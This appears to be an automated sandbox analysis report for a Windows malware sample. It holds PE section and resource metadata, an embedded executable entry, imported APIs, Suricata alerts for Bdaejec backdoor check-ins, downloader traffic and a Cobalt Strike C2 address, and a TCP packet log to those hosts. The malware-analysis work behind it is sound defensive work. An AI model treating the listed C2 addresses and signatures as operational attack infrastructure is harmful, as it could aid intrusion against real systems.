.data1	0x4e000	0xbb8	0xc00	72d754e129ede668e69798f49ebbe2c3	False	0.4391276041666667	data	4.119554788577961	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.trace	0x4f000	0x774	0x800	4746bd2da2f4ecf9897856bb55e4e532	False	0.46044921875	data	5.57633689464484	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x50000	0x2299c	0x22a00	aec849dcf06b26e88fdedaf5af076757	False	0.5493922044223827	data	6.8128172215502705	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x73000	0x54f6	0x5600	70210ed0d9b50a506ae4860de94a4773	False	0.583984375	data	5.990776825683021	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
1uD	0x79000	0x5000	0x4200	97528d061fa1166710c7e3d2761cf6c5	False	0.7774621212121212	data	6.934614473647855	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RCDATA	0x50688	0xb68c	data	English	United States	0.988145168193101
RCDATA	0x5bd14	0x1b42	data	English	United States	1.0015763829177415
RT_BITMAP	0x5d858	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5021551724137931
RT_BITMAP	0x5da28	0x428	Device independent bitmap graphic, 16 x 16 x 32, image size 1024	English	United States	0.2161654135338346
RT_BITMAP	0x5de50	0x98	Device independent bitmap graphic, 9 x 6 x 4, image size 48, 16 important colors	English	United States	0.506578947368421
RT_ICON	0x5dee8	0x1131	PNG image data, 256 x 256, 8-bit/color RGB, non-interlaced	English	United States	0.985912292660759
RT_ICON	0x5f01c	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 0, resolution 11811 x 11811 px/m	English	United States	0.16926987060998153
RT_ICON	0x644a4	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 0, resolution 11811 x 11811 px/m	English	United States	0.17530703826169108
RT_ICON	0x686cc	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0, resolution 11811 x 11811 px/m	English	United States	0.2341286307053942
RT_ICON	0x6ac74	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0, resolution 11811 x 11811 px/m	English	United States	0.3079268292682927
RT_ICON	0x6bd1c	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0, resolution 11811 x 11811 px/m	English	United States	0.4004098360655738
RT_ICON	0x6c6a4	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0, resolution 11811 x 11811 px/m	English	United States	0.524822695035461
RT_DIALOG	0x6cb0c	0x6a	data	English	United States	0.8018867924528302
RT_DIALOG	0x6cb78	0x270	data	English	United States	0.47115384615384615
RT_DIALOG	0x6cde8	0x4cc	data	English	United States	0.3965798045602606
RT_DIALOG	0x6d2b4	0x7d8	data	English	United States	0.39193227091633465
RT_DIALOG	0x6da8c	0xee	data	English	United States	0.6512605042016807
RT_RCDATA	0x6db7c	0x1800	PE32+ executable (console) x86-64, for MS Windows	English	United States	0.3924153645833333
RT_RCDATA	0x6f37c	0x274	data	English	United States	0.5812101910828026
RT_RCDATA	0x6f5f0	0x9bd	Delphi compiled form 'TfmReference'	English	United States	0.44885679903730447
RT_RCDATA	0x6ffb0	0x34d	Delphi compiled form 'TMEContactForm'	English	United States	0.43431952662721895
RT_RCDATA	0x70300	0x2092	Delphi compiled form 'TWizardForm'	English	United States	0.2299112497001679
RT_RCDATA	0x72394	0x80	data	English	United States	1.0859375
RT_GROUP_ICON	0x72414	0x68	data	English	United States	0.7884615384615384
RT_VERSION	0x7247c	0x318	data	English	United States	0.47474747474747475
RT_MANIFEST	0x72794	0x205	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5667311411992263

Imports

DLL	Import
KERNEL32.dll	CreateFileA, GetConsoleOutputCP, WriteConsoleA, SetStdHandle, FlushFileBuffers, GetLocaleInfoA, LCMapStringW, LCMapStringA, GetConsoleMode, GetConsoleCP, SetFilePointer, InitializeCriticalSectionAndSpinCount, GetSystemTimeAsFileTime, GetCurrentProcessId, GetTickCount, QueryPerformanceCounter, SetHandleCount, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsA, LoadLibraryW, GetStringTypeW, GetStringTypeA, IsValidCodePage, GetACP, GetCPInfo, WriteFile, ExitProcess, Sleep, HeapSize, HeapReAlloc, HeapCreate, TlsFree, TlsSetValue, TlsAlloc, TlsGetValue, GetStartupInfoA, GetCommandLineA, GetModuleFileNameW, GetFileType, WriteConsoleW, VirtualQuery, GetSystemInfo, GetModuleHandleW, VirtualProtect, RtlUnwind, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TerminateProcess, VirtualFree, IsProcessorFeaturePresent, LoadLibraryA, HeapAlloc, GetProcessHeap, HeapFree, InterlockedCompareExchange, InitializeCriticalSection, IsDBCSLeadByte, GetProcAddress, lstrcmpiA, FreeLibrary, SizeofResource, LoadLibraryExA, WideCharToMultiByte, GlobalUnlock, GlobalLock, lstrcmpA, MulDiv, lstrlenW, MultiByteToWideChar, lstrlenA, GetModuleFileNameA, InterlockedIncrement, InterlockedDecrement, FlushInstructionCache, DeleteCriticalSection, GlobalAlloc, RaiseException, GlobalFree, GlobalHandle, LockResource, LoadResource, FindResourceA, LeaveCriticalSection, EnterCriticalSection, GetCurrentThreadId, GetLastError, GetSystemTime, GetModuleHandleA, WaitForSingleObject, CancelWaitableTimer, WaitForMultipleObjectsEx, SetWaitableTimer, LocalFileTimeToFileTime, SystemTimeToFileTime, GetLocalTime, CreateEventA, CreateWaitableTimerA, VirtualAlloc, CreateToolhelp32Snapshot, SetLastError, GetConsoleScreenBufferInfo, GetStdHandle, MapViewOfFile, OpenFileMappingA, CloseHandle, GetCurrentProcess, GetCurrentThread, GetOEMCP
USER32.dll	SetRect, DefWindowProcA, SetLayeredWindowAttributes, CreateMenu, CreatePopupMenu, SetMenu, SetCapture, InvalidateRect, GetCursorPos, TrackPopupMenu, OffsetRect, GetCapture, BeginPaint, EndPaint, GetMenuCheckMarkDimensions, GetFocus, DrawTextA, CopyRect, DrawFocusRect, MapDialogRect, SetWindowContextHelpId, DialogBoxParamA, GetWindowRect, MonitorFromWindow, GetMonitorInfoA, MapWindowPoints, GetSystemMetrics, SendDlgItemMessageA, RegisterWindowMessageA, InvalidateRgn, SetScrollInfo, GetScrollInfo, ScrollWindow, UpdateWindow, DrawEdge, LoadStringA, PtInRect, GetDlgCtrlID, SetRectEmpty, SetScrollPos, GetScrollPos, DestroyMenu, GetScrollRange, SetCursor, SetWindowTextA, GetWindowTextA, GetWindowTextLengthA, EndDialog, GetDesktopWindow, ReleaseCapture, GetWindow, IsChild, SetFocus, ScreenToClient, ClientToScreen, CreateAcceleratorTableA, FillRect, CharNextA, SetWindowPos, GetClassNameA, GetParent, ReleaseDC, DestroyAcceleratorTable, IsWindow, RedrawWindow, RegisterClassExA, GetClassInfoExA, GetWindowLongA, CallWindowProcA, SetWindowLongA, DialogBoxIndirectParamA, GetSysColor, SendMessageW, GetActiveWindow, GetCursor, AttachThreadInput, GetWindowThreadProcessId, WindowFromPoint, GetCursorInfo, IsRectEmpty, KillTimer, TrackPopupMenuEx, SetTimer, GetDC, MoveWindow, GetDlgItem, LoadImageA, CreateWindowExW, GetClientRect, CreateWindowExA, LoadIconA, LoadCursorA, AppendMenuA, GetSystemMenu, LoadBitmapA, DestroyWindow, SendMessageA, DrawFrameControl, UnregisterClassA
GDI32.dll	LineTo, MoveToEx, SetMapMode, GetMapMode, CreateFontIndirectA, SelectObject, CreateEllipticRgn, CreateCompatibleDC, CreateSolidBrush, GetObjectA, BitBlt, StretchBlt, DeleteDC, EnumFontFamiliesA, CreatePen, DeleteObject, GetDeviceCaps, CreateCompatibleBitmap, GetStockObject, SaveDC, GetTextExtentPoint32A, GetTextColor, RestoreDC, GetCurrentPositionEx, GetClipBox, LPtoDP, DPtoLP, SetWindowOrgEx, SetBkMode, SetBkColor, BeginPath, SetTextColor, ExtTextOutA
COMDLG32.dll	ChooseFontA, GetOpenFileNameA
ADVAPI32.dll	RegDeleteValueA, OpenProcessToken, GetTokenInformation, AllocateAndInitializeSid, RegSetValueExA, RegDeleteKeyA, RegCreateKeyExA, RegQueryInfoKeyA, OpenThreadToken, RegEnumKeyExA, RegCloseKey, RegOpenKeyExA, FreeSid, EqualSid
SHELL32.dll	SHGetMalloc, SHGetDesktopFolder
ole32.dll	OleInitialize, OleUninitialize, CoTaskMemRealloc, StringFromGUID2, OleLockRunning, CLSIDFromString, CoGetClassObject, CLSIDFromProgID, CreateStreamOnHGlobal, CoUninitialize, CoTaskMemFree, CoCreateInstance, CoInitialize, CoTaskMemAlloc
OLEAUT32.dll	LoadTypeLib, SysAllocStringLen, VarUI4FromStr, OleCreateFontIndirect, SysAllocString, VariantClear, VariantInit, LoadRegTypeLib, SysStringLen, SysFreeString, OleLoadPicture
MSIMG32.dll	TransparentBlt
WINTRUST.dll	CryptCATGetCatAttrInfo, CryptCATGetMemberInfo, CryptCATHandleFromStore
Secur32.dll	QuerySecurityPackageInfoA
COMCTL32.dll	ImageList_GetImageInfo, ImageList_Draw, ImageList_GetImageCount, InitCommonControlsEx
SHLWAPI.dll	StrRetToStrA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-25T15:13:30.018479+0200	TCP	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	49726	443	192.168.2.6	20.42.73.29
2024-07-25T15:15:33.325593+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	49756	80	192.168.2.6	44.221.84.105
2024-07-25T15:15:13.424683+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	49753	80	192.168.2.6	92.246.89.93
2024-07-25T15:13:19.352778+0200	UDP	2838522	ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup	61964	53	192.168.2.6	1.1.1.1
2024-07-25T15:13:51.355961+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49738	799	192.168.2.6	44.221.84.105
2024-07-25T15:14:38.021714+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	49747	80	192.168.2.6	92.246.89.93
2024-07-25T15:16:11.428877+0200	TCP	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	80	49764	34.218.204.173	192.168.2.6
2024-07-25T15:16:36.375930+0200	TCP	2527002	ET Threatview.io High Confidence Cobalt Strike C2 IP group 3	80	49770	74.119.239.234	192.168.2.6
2024-07-25T15:13:42.539489+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	49733	80	192.168.2.6	170.39.226.155
2024-07-25T15:14:50.224302+0200	TCP	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	80	49749	44.221.84.105	192.168.2.6
2024-07-25T15:16:57.852843+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	49770	80	192.168.2.6	74.119.239.234
2024-07-25T15:16:22.126954+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	49767	80	192.168.2.6	54.244.188.177
2024-07-25T15:13:41.635043+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49731	799	192.168.2.6	44.221.84.105
2024-07-25T15:16:02.561286+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	49762	80	192.168.2.6	44.213.104.86
2024-07-25T15:15:59.589424+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	49761	80	192.168.2.6	18.141.10.107
2024-07-25T15:15:22.630192+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	49754	80	192.168.2.6	208.100.26.245
2024-07-25T15:13:37.565241+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49729	13.85.23.86	192.168.2.6
2024-07-25T15:15:47.481369+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	49760	80	192.168.2.6	185.215.113.66
2024-07-25T15:16:04.594112+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	49763	80	192.168.2.6	54.244.188.177
2024-07-25T15:13:24.873191+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49724	799	192.168.2.6	44.221.84.105
2024-07-25T15:16:03.569322+0200	TCP	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	80	49762	44.213.104.86	192.168.2.6
2024-07-25T15:16:00.606808+0200	TCP	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	80	49761	18.141.10.107	192.168.2.6
2024-07-25T15:16:10.422241+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	49764	80	192.168.2.6	34.218.204.173
2024-07-25T15:13:47.058273+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49737	799	192.168.2.6	44.221.84.105
2024-07-25T15:15:46.397489+0200	TCP	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	80	49759	13.251.16.150	192.168.2.6
2024-07-25T15:14:28.521053+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	49742	80	192.168.2.6	92.246.89.93
2024-07-25T15:14:59.237828+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	49751	80	192.168.2.6	92.246.89.93
2024-07-25T15:13:53.993201+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49739	799	192.168.2.6	44.221.84.105
2024-07-25T15:15:45.378020+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	49759	80	192.168.2.6	13.251.16.150
2024-07-25T15:14:15.205118+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49744	13.85.23.86	192.168.2.6
2024-07-25T15:14:49.123532+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	49749	80	192.168.2.6	44.221.84.105
2024-07-25T15:14:05.816494+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	49736	80	192.168.2.6	92.63.197.48
2024-07-25T15:13:19.951471+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49722	799	192.168.2.6	44.221.84.105
2024-07-25T15:13:44.441888+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49735	799	192.168.2.6	44.221.84.105
2024-07-25T15:17:05.252309+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	49771	80	192.168.2.6	54.244.188.177
2024-07-25T15:16:04.594153+0200	TCP	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	80	49763	54.244.188.177	192.168.2.6
2024-07-25T15:15:29.430204+0200	TCP	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	80	49755	44.213.104.86	192.168.2.6
2024-07-25T15:16:30.553398+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	49769	80	192.168.2.6	54.244.188.177
2024-07-25T15:15:28.415157+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	49755	80	192.168.2.6	44.213.104.86
2024-07-25T15:16:27.854244+0200	UDP	2018316	ET MALWARE Possible Zeus GameOver/FluBot Related DGA NXDOMAIN Responses	53	51387	1.1.1.1	192.168.2.6
2024-07-25T15:16:13.644028+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	49766	80	192.168.2.6	54.244.188.177

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 15:13:19.527343035 CEST	49722	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:19.532785892 CEST	799	49722	44.221.84.105	192.168.2.6
Jul 25, 2024 15:13:19.532874107 CEST	49722	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:19.618397951 CEST	49722	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:19.623466015 CEST	799	49722	44.221.84.105	192.168.2.6
Jul 25, 2024 15:13:19.951332092 CEST	799	49722	44.221.84.105	192.168.2.6
Jul 25, 2024 15:13:19.951471090 CEST	49722	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:19.951823950 CEST	799	49722	44.221.84.105	192.168.2.6
Jul 25, 2024 15:13:19.951879025 CEST	49722	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:19.953090906 CEST	49722	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:19.958446026 CEST	799	49722	44.221.84.105	192.168.2.6
Jul 25, 2024 15:13:24.446144104 CEST	49724	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:24.451874018 CEST	799	49724	44.221.84.105	192.168.2.6
Jul 25, 2024 15:13:24.452018976 CEST	49724	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:24.452306986 CEST	49724	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:24.457834959 CEST	799	49724	44.221.84.105	192.168.2.6
Jul 25, 2024 15:13:24.873049974 CEST	799	49724	44.221.84.105	192.168.2.6
Jul 25, 2024 15:13:24.873191118 CEST	49724	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:24.874160051 CEST	799	49724	44.221.84.105	192.168.2.6
Jul 25, 2024 15:13:24.874501944 CEST	49724	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:24.875358105 CEST	49724	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:24.880661964 CEST	799	49724	44.221.84.105	192.168.2.6
Jul 25, 2024 15:13:39.596640110 CEST	49731	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:40.211086035 CEST	799	49731	44.221.84.105	192.168.2.6
Jul 25, 2024 15:13:40.211189032 CEST	49731	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:40.221301079 CEST	49731	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:41.224095106 CEST	799	49731	44.221.84.105	192.168.2.6
Jul 25, 2024 15:13:41.226164103 CEST	49731	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:41.233175039 CEST	799	49731	44.221.84.105	192.168.2.6
Jul 25, 2024 15:13:41.563338041 CEST	49733	80	192.168.2.6	170.39.226.155
Jul 25, 2024 15:13:41.568283081 CEST	80	49733	170.39.226.155	192.168.2.6
Jul 25, 2024 15:13:41.568463087 CEST	49733	80	192.168.2.6	170.39.226.155
Jul 25, 2024 15:13:41.579219103 CEST	49733	80	192.168.2.6	170.39.226.155
Jul 25, 2024 15:13:41.584355116 CEST	80	49733	170.39.226.155	192.168.2.6
Jul 25, 2024 15:13:41.634917021 CEST	799	49731	44.221.84.105	192.168.2.6
Jul 25, 2024 15:13:41.635042906 CEST	49731	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:41.635552883 CEST	799	49731	44.221.84.105	192.168.2.6
Jul 25, 2024 15:13:41.635596037 CEST	49731	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:41.637311935 CEST	49731	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:41.649199963 CEST	799	49731	44.221.84.105	192.168.2.6
Jul 25, 2024 15:13:42.539278984 CEST	80	49733	170.39.226.155	192.168.2.6
Jul 25, 2024 15:13:42.539489031 CEST	49733	80	192.168.2.6	170.39.226.155
Jul 25, 2024 15:13:42.756103039 CEST	49734	80	192.168.2.6	199.59.243.226
Jul 25, 2024 15:13:42.761708975 CEST	80	49734	199.59.243.226	192.168.2.6
Jul 25, 2024 15:13:42.761801004 CEST	49734	80	192.168.2.6	199.59.243.226
Jul 25, 2024 15:13:42.762067080 CEST	49734	80	192.168.2.6	199.59.243.226
Jul 25, 2024 15:13:42.772491932 CEST	80	49734	199.59.243.226	192.168.2.6
Jul 25, 2024 15:13:43.265232086 CEST	80	49734	199.59.243.226	192.168.2.6
Jul 25, 2024 15:13:43.265315056 CEST	49734	80	192.168.2.6	199.59.243.226
Jul 25, 2024 15:13:43.265372038 CEST	80	49734	199.59.243.226	192.168.2.6
Jul 25, 2024 15:13:43.265554905 CEST	49734	80	192.168.2.6	199.59.243.226
Jul 25, 2024 15:13:43.790323019 CEST	49735	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:43.999459982 CEST	799	49735	44.221.84.105	192.168.2.6
Jul 25, 2024 15:13:44.002218962 CEST	49735	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:44.022974968 CEST	49735	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:44.028070927 CEST	799	49735	44.221.84.105	192.168.2.6
Jul 25, 2024 15:13:44.298873901 CEST	49734	80	192.168.2.6	199.59.243.226
Jul 25, 2024 15:13:44.298922062 CEST	49734	80	192.168.2.6	199.59.243.226
Jul 25, 2024 15:13:44.432631969 CEST	49736	80	192.168.2.6	92.63.197.48
Jul 25, 2024 15:13:44.441735029 CEST	80	49736	92.63.197.48	192.168.2.6
Jul 25, 2024 15:13:44.441783905 CEST	799	49735	44.221.84.105	192.168.2.6
Jul 25, 2024 15:13:44.441859961 CEST	49736	80	192.168.2.6	92.63.197.48
Jul 25, 2024 15:13:44.441888094 CEST	49735	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:44.442042112 CEST	49736	80	192.168.2.6	92.63.197.48
Jul 25, 2024 15:13:44.444720030 CEST	799	49735	44.221.84.105	192.168.2.6
Jul 25, 2024 15:13:44.444782019 CEST	49735	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:44.445810080 CEST	49735	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:44.446788073 CEST	80	49736	92.63.197.48	192.168.2.6
Jul 25, 2024 15:13:44.455039978 CEST	799	49735	44.221.84.105	192.168.2.6
Jul 25, 2024 15:13:46.081536055 CEST	80	49733	170.39.226.155	192.168.2.6
Jul 25, 2024 15:13:46.081609011 CEST	49733	80	192.168.2.6	170.39.226.155
Jul 25, 2024 15:13:46.649044037 CEST	49737	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:46.654526949 CEST	799	49737	44.221.84.105	192.168.2.6
Jul 25, 2024 15:13:46.654692888 CEST	49737	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:46.669744015 CEST	49737	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:46.675914049 CEST	799	49737	44.221.84.105	192.168.2.6
Jul 25, 2024 15:13:47.058120012 CEST	799	49737	44.221.84.105	192.168.2.6
Jul 25, 2024 15:13:47.058212042 CEST	799	49737	44.221.84.105	192.168.2.6
Jul 25, 2024 15:13:47.058273077 CEST	49737	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:47.059492111 CEST	49737	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:47.059492111 CEST	49737	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:47.064668894 CEST	799	49737	44.221.84.105	192.168.2.6
Jul 25, 2024 15:13:50.919034004 CEST	49738	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:50.951405048 CEST	799	49738	44.221.84.105	192.168.2.6
Jul 25, 2024 15:13:50.951550961 CEST	49738	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:50.951833010 CEST	49738	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:50.965195894 CEST	799	49738	44.221.84.105	192.168.2.6
Jul 25, 2024 15:13:51.355884075 CEST	799	49738	44.221.84.105	192.168.2.6
Jul 25, 2024 15:13:51.355961084 CEST	49738	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:51.356477976 CEST	799	49738	44.221.84.105	192.168.2.6
Jul 25, 2024 15:13:51.356537104 CEST	49738	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:51.357373953 CEST	49738	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:51.362638950 CEST	799	49738	44.221.84.105	192.168.2.6
Jul 25, 2024 15:13:53.591869116 CEST	49739	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:53.596898079 CEST	799	49739	44.221.84.105	192.168.2.6
Jul 25, 2024 15:13:53.596976995 CEST	49739	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:53.598258972 CEST	49739	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:53.603276014 CEST	799	49739	44.221.84.105	192.168.2.6
Jul 25, 2024 15:13:53.993069887 CEST	799	49739	44.221.84.105	192.168.2.6
Jul 25, 2024 15:13:53.993105888 CEST	799	49739	44.221.84.105	192.168.2.6
Jul 25, 2024 15:13:53.993201017 CEST	49739	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:53.993242979 CEST	49739	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:54.006617069 CEST	49739	799	192.168.2.6	44.221.84.105
Jul 25, 2024 15:13:54.012000084 CEST	799	49739	44.221.84.105	192.168.2.6
Jul 25, 2024 15:14:05.816315889 CEST	80	49736	92.63.197.48	192.168.2.6
Jul 25, 2024 15:14:05.816493988 CEST	49736	80	192.168.2.6	92.63.197.48
Jul 25, 2024 15:14:05.817023039 CEST	49736	80	192.168.2.6	92.63.197.48
Jul 25, 2024 15:14:05.822362900 CEST	80	49736	92.63.197.48	192.168.2.6
Jul 25, 2024 15:14:07.007265091 CEST	49742	80	192.168.2.6	92.246.89.93
Jul 25, 2024 15:14:07.012350082 CEST	80	49742	92.246.89.93	192.168.2.6
Jul 25, 2024 15:14:07.012469053 CEST	49742	80	192.168.2.6	92.246.89.93
Jul 25, 2024 15:14:07.012612104 CEST	49742	80	192.168.2.6	92.246.89.93
Jul 25, 2024 15:14:07.017654896 CEST	80	49742	92.246.89.93	192.168.2.6
Jul 25, 2024 15:14:28.520955086 CEST	80	49742	92.246.89.93	192.168.2.6
Jul 25, 2024 15:14:28.521053076 CEST	49742	80	192.168.2.6	92.246.89.93
Jul 25, 2024 15:14:28.521159887 CEST	49742	80	192.168.2.6	92.246.89.93
Jul 25, 2024 15:14:28.525917053 CEST	80	49742	92.246.89.93	192.168.2.6
Jul 25, 2024 15:14:30.006541967 CEST	49747	80	192.168.2.6	92.246.89.93
Jul 25, 2024 15:14:30.014746904 CEST	80	49747	92.246.89.93	192.168.2.6
Jul 25, 2024 15:14:30.014868021 CEST	49747	80	192.168.2.6	92.246.89.93
Jul 25, 2024 15:14:30.015019894 CEST	49747	80	192.168.2.6	92.246.89.93
Jul 25, 2024 15:14:30.023714066 CEST	80	49747	92.246.89.93	192.168.2.6
Jul 25, 2024 15:14:38.021713972 CEST	49747	80	192.168.2.6	92.246.89.93
Jul 25, 2024 15:14:48.611820936 CEST	49749	80	192.168.2.6	44.221.84.105
Jul 25, 2024 15:14:48.618596077 CEST	80	49749	44.221.84.105	192.168.2.6
Jul 25, 2024 15:14:48.618688107 CEST	49749	80	192.168.2.6	44.221.84.105
Jul 25, 2024 15:14:48.618901968 CEST	49749	80	192.168.2.6	44.221.84.105
Jul 25, 2024 15:14:48.624283075 CEST	80	49749	44.221.84.105	192.168.2.6
Jul 25, 2024 15:14:49.123444080 CEST	80	49749	44.221.84.105	192.168.2.6
Jul 25, 2024 15:14:49.123466015 CEST	80	49749	44.221.84.105	192.168.2.6
Jul 25, 2024 15:14:49.123532057 CEST	49749	80	192.168.2.6	44.221.84.105
Jul 25, 2024 15:14:50.126854897 CEST	49749	80	192.168.2.6	44.221.84.105
Jul 25, 2024 15:14:50.224302053 CEST	80	49749	44.221.84.105	192.168.2.6
Jul 25, 2024 15:14:55.235681057 CEST	49751	80	192.168.2.6	92.246.89.93
Jul 25, 2024 15:14:55.240565062 CEST	80	49751	92.246.89.93	192.168.2.6
Jul 25, 2024 15:14:55.240693092 CEST	49751	80	192.168.2.6	92.246.89.93
Jul 25, 2024 15:14:55.240864038 CEST	49751	80	192.168.2.6	92.246.89.93
Jul 25, 2024 15:14:55.245618105 CEST	80	49751	92.246.89.93	192.168.2.6
Jul 25, 2024 15:14:59.237828016 CEST	49751	80	192.168.2.6	92.246.89.93
Jul 25, 2024 15:14:59.237978935 CEST	49733	80	192.168.2.6	170.39.226.155
Jul 25, 2024 15:14:59.550148010 CEST	49733	80	192.168.2.6	170.39.226.155
Jul 25, 2024 15:15:00.158144951 CEST	49733	80	192.168.2.6	170.39.226.155
Jul 25, 2024 15:15:01.361170053 CEST	49733	80	192.168.2.6	170.39.226.155
Jul 25, 2024 15:15:03.767431974 CEST	49733	80	192.168.2.6	170.39.226.155
Jul 25, 2024 15:15:08.579945087 CEST	49733	80	192.168.2.6	170.39.226.155
Jul 25, 2024 15:15:09.406980991 CEST	49753	80	192.168.2.6	92.246.89.93
Jul 25, 2024 15:15:09.415255070 CEST	80	49753	92.246.89.93	192.168.2.6
Jul 25, 2024 15:15:09.415361881 CEST	49753	80	192.168.2.6	92.246.89.93
Jul 25, 2024 15:15:09.417257071 CEST	49753	80	192.168.2.6	92.246.89.93
Jul 25, 2024 15:15:09.423211098 CEST	80	49753	92.246.89.93	192.168.2.6
Jul 25, 2024 15:15:13.424683094 CEST	49753	80	192.168.2.6	92.246.89.93
